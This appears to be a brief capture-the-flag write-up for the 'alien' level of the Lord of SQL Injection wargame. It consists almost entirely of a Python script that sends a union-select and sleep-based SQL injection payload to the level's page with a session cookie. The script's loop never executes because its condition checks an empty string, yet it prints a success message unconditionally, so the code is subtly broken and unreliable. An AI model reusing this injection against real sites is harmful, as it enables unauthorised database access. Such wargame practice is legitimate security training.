WRITE UP
1 2 3 4 5 6 7 8 9 10 11 12 13 | import requests url = "http://los.rubiya.kr/alien_91104597bf79b4d893425b65c166d484.php" session = {'PHPSESSID':'MY_SESSION'} res='' data = {'no':"0||id=' #' " + "union select * from (select 0x62 as t union select 0x61646d696e) as k " + "where ascii(mid(t,1,1)) < second(now())%3+97 union select sleep(1)+1#" } while "Clear!" in res: res = requests.get(url, params=data, cookies = session).text print("[♪] ALIEN Clear!") | cs |